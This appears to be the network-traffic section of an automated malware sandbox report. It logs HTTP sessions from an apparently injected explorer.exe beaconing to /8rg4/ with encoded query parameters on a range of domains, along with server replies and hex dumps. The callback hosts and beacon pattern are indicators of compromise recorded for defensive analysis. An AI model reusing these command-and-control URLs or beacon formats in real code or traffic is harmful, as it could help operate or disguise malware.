                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>-</title><link rel="stylesheet" type="text/css" /><style>*{margin:0;padding:0}body{font-family:"";background:#DAD9D7}img{border:none}a *{cursor:pointer}ul,li{list-style:none}table{table-layout:fixed;}table tr td{word-break:break-all; word-wrap:break-word;}a{text-decoration:none;outline:none}a:hover{text-decoration:underline}.cf:after{content: ".";display: block;height: 0;font-size: 0;clear:both;visibility: hidden;}.cf{zoom: 1;clear:both}.bg{width:100%;background:url("404/01.jpg") no-repeat center top #DAD9D7;position:absolute;top:0;left:0;height:600px;overflow:hidden}.cont{margin:0 auto;width:500px;line-height:20px;}.c1{height:360px;text-align:center}.c1 .img1{margin-top:180px}.c1 .img2{margin-top:165px}.cont h2{text-align:center;color:#555;font-size:18px;font-weight:nor


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    16192.168.2.349765195.78.66.13780C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:50:37.732845068 CET6333OUTGET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1
                                                                    Host: www.puzelhome.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:50:38.267407894 CET6334INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-transform, no-cache, no-store, must-revalidate
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Link: <http://www.puzzelhome.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                                    X-LiteSpeed-Cache: hit
                                                                    Content-Length: 49522
                                                                    Date: Wed, 13 Jan 2021 19:50:37 GMT
                                                                    Server: LiteSpeed
                                                                    Vary: User-Agent


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.34973137.48.65.15080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:48:30.123297930 CET1014OUTGET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1
                                                                    Host: www.tomatrader.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:48:30.411103010 CET1017INHTTP/1.1 302 Found
                                                                    cache-control: max-age=0, private, must-revalidate
                                                                    connection: close
                                                                    content-length: 11
                                                                    date: Wed, 13 Jan 2021 19:48:29 GMT
                                                                    location: http://survey-smiles.com
                                                                    server: nginx
                                                                    set-cookie: sid=4f9b09d2-55d8-11eb-a7b2-55f977ddc834; path=/; domain=.tomatrader.com; expires=Mon, 31 Jan 2089 23:02:37 GMT; max-age=2147483647; HttpOnly
                                                                    Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                    Data Ascii: Redirecting


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.34974054.208.77.12480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:48:45.960675955 CET5420OUTGET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1
                                                                    Host: www.futbolclubbarcelona.soccer
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:48:46.088377953 CET5421INHTTP/1.1 302 Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Date: Wed, 13 Jan 2021 19:48:46 GMT
                                                                    Location: https://www.afternic.com/forsale/futbolclubbarcelona.soccer?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH
                                                                    Server: nginx/1.16.1
                                                                    Content-Length: 303
                                                                    Connection: Close
                                                                    Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 66 74 65 72 6e 69 63 2e 63 6f 6d 2f 66 6f 72 73 61 6c 65 2f 66 75 74 62 6f 6c 63 6c 75 62 62 61 72 63 65 6c 6f 6e 61 2e 73 6f 63 63 65 72 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 74 79 70 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 69 64 3d 64 61 73 6c 6e 63 26 61 6d 70 3b 47 58 49 54 43 3d 4f 43 55 70 61 38 71 71 6e 35 63 46 66 37 51 58 71 79 41 4c 4d 55 68 57 71 35 39 4a 62 6d 78 75 65 4d 55 75 6b 2b 34 2b 64 4c 49 47 37 54 43 59 36 78 62 77 50 4c 4f 50 72 61 37 48 61 51 73 51 74 70 66 57 26 61 6d 70 3b 4a 74 37 3d 58 50 79 34 6e 46 6a 48 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                    Data Ascii: <a href="https://www.afternic.com/forsale/futbolclubbarcelona.soccer?utm_source=TDFS_DASLNC&amp;utm_medium=DASLNC&amp;utm_campaign=TDFS_DASLNC&amp;traffic_type=TDFS_DASLNC&amp;traffic_id=daslnc&amp;GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&amp;Jt7=XPy4nFjH">Found</a>.


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.349741135.181.31.21280C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:48:51.270602942 CET5422OUTGET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1
                                                                    Host: www.ondesign03.net
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:48:51.336184025 CET5423INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 13 Jan 2021 19:48:51 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 1417
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Last-Modified: Wed, 05 Aug 2020 09:00:18 GMT
                                                                    ETag: "589-5ac1d99d73c92"
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6f 6e 64 65 73 69 67 6e 30 33 2e 6e 65 74 2f 22 3e 6f 6e 64 65 73 69 67 6e 30 33 2e 6e 65 74 3c 2f 61 3e 3c 2f 70 3e 0a
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:320px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:320px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><body> <p><a href="http://ondesign03.net/">ondesign03.net</a></p>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    5192.168.2.34974234.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:48:56.452843904 CET5424OUTGET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1
                                                                    Host: www.crafteest.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:48:56.592288017 CET5425INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Wed, 13 Jan 2021 19:48:56 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "5ffc83a1-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    6192.168.2.349743104.233.238.20780C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:49:02.043426037 CET5426OUTGET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1
                                                                    Host: www.4037a.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:49:02.244457006 CET5428INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Server: Microsoft-IIS/7.5
                                                                    Date: Wed, 13 Jan 2021 19:24:32 GMT
                                                                    Connection: close
                                                                    Content-Length: 2885
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 37 22 20 2f 3e 20 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e b0 a5 d1 bd a1 ad c4 fa b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da 2d b9 dc bc d2 c6 c5 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 0d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 ce a2 c8 ed d1 c5 ba da 22 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 44 41 44 39 44 37 7d 0d 0a 69 6d 67 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 0d 0a 61 20 2a 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 0d 0a 75 6c 2c 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 0d 0a 74 61 62 6c 65 7b 74 61 62 6c 65 2d 6c 61 79 6f 75 74 3a 66 69 78 65 64 3b 7d 0d 0a 74 61 62 6c 65 20 74 72 20 74 64 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 20 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 0d 0a 0d 0a 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 0d 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 0d 0a 2e 63 66 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 20 22 2e 22 3b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 7d 0d 0a 2e 63 66 7b 7a 6f 6f 6d 3a 20 31 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 0d 0a 0d 0a 2e 62 67 7b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 34 30 34 2f 30 31 2e 6a 70 67 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 74 6f 70 20 23 44 41 44 39 44 37 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 68 65 69 67 68 74 3a 36 30 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 0d 0a 2e 63 6f 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 7d 0d 0a 2e 63 31 7b 68 65 69 67 68 74 3a 33 36 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0d 0a 2e 63 31 20 2e 69 6d 67 31 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 38 30 70 78 7d 0d 0a 2e 63 31 20 2e 69 6d 67 32 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 36 35 70 78 7d 0d 0a 2e 63 6f 6e 74 20 68 32 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>-</title><link rel="stylesheet" type="text/css" /><style>*{margin:0;padding:0}body{font-family:"";background:#DAD9D7}img{border:none}a *{cursor:pointer}ul,li{list-style:none}table{table-layout:fixed;}table tr td{word-break:break-all; word-wrap:break-word;}a{text-decoration:none;outline:none}a:hover{text-decoration:underline}.cf:after{content: ".";display: block;height: 0;font-size: 0;clear:both;visibility: hidden;}.cf{zoom: 1;clear:both}.bg{width:100%;background:url("404/01.jpg") no-repeat center top #DAD9D7;position:absolute;top:0;left:0;height:600px;overflow:hidden}.cont{margin:0 auto;width:500px;line-height:20px;}.c1{height:360px;text-align:center}.c1 .img1{margin-top:180px}.c1 .img2{margin-top:165px}.cont h2{text-align:center;color:#555;font-size:18px;font-weight:nor


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    7192.168.2.349744195.78.66.13780C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:49:07.643075943 CET5430OUTGET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1
                                                                    Host: www.puzelhome.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:49:09.570158958 CET5432INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-transform, no-cache, no-store, must-revalidate
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Link: <http://www.puzzelhome.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                                    Set-Cookie: yith_wcwl_session_de4d178820413a8064bad1166f83953b=%7B%22session_id%22%3A%22225d8092df40a93a702760e8bac560e5%22%2C%22session_expiration%22%3A1613159349%2C%22session_expiring%22%3A1613155749%2C%22cookie_hash%22%3A%22d22c1d94f9faae3438ad9486069ebcfe%22%7D; expires=Fri, 12-Feb-2021 19:49:09 GMT; Max-Age=2592000; path=/; HttpOnly
                                                                    X-LiteSpeed-Cache-Control: public,max-age=3600
                                                                    X-LiteSpeed-Tag: 066_HTTP.404,066_404,066_URL.4dd4e4aa8eba5784d63701e34cfa2e8d,066_
                                                                    X-Litespeed-Cache: miss
                                                                    Transfer-Encoding: chunked
                                                                    Date: Wed, 13 Jan 2021 19:49:08 GMT
                                                                    Server: LiteSpeed
                                                                    Vary: User-Agent
                                                                    Data Raw: 63 31 37 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 09 09 09 09 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 2b 20 27 20 79 65 73 2d 6a 73 20 6a 73 5f 61 63 74 69 76 65 20 6a 73 27 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 53 74 72 6f 6e 61 20 6e 69 65 20 7a 6f 73 74 61 c5 82 61 20 7a 6e 61 6c 65 7a 69 6f 6e 61 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 3e 77 69
                                                                    Data Ascii: c172<!doctype html><html lang="pl-PL"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /><script>document.documentElement.className = document.documentElement.className + ' yes-js js_active js'</script><title>Strona nie zostaa znaleziona</title><script>wi


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    8192.168.2.34974734.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:49:33.632935047 CET5464OUTGET /8rg4/?Jt7=XPy4nFjH&GXITC=A4ItsHP+WlrLG/knzE1FqdRUH2iuHEJ7BxsWyFaOnTa5UmbK6eGivqtSi2ljMDHkmrx5 HTTP/1.1
                                                                    Host: www.bodyfuelrtd.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:49:33.772039890 CET5465INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Wed, 13 Jan 2021 19:49:33 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "5ffc838f-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
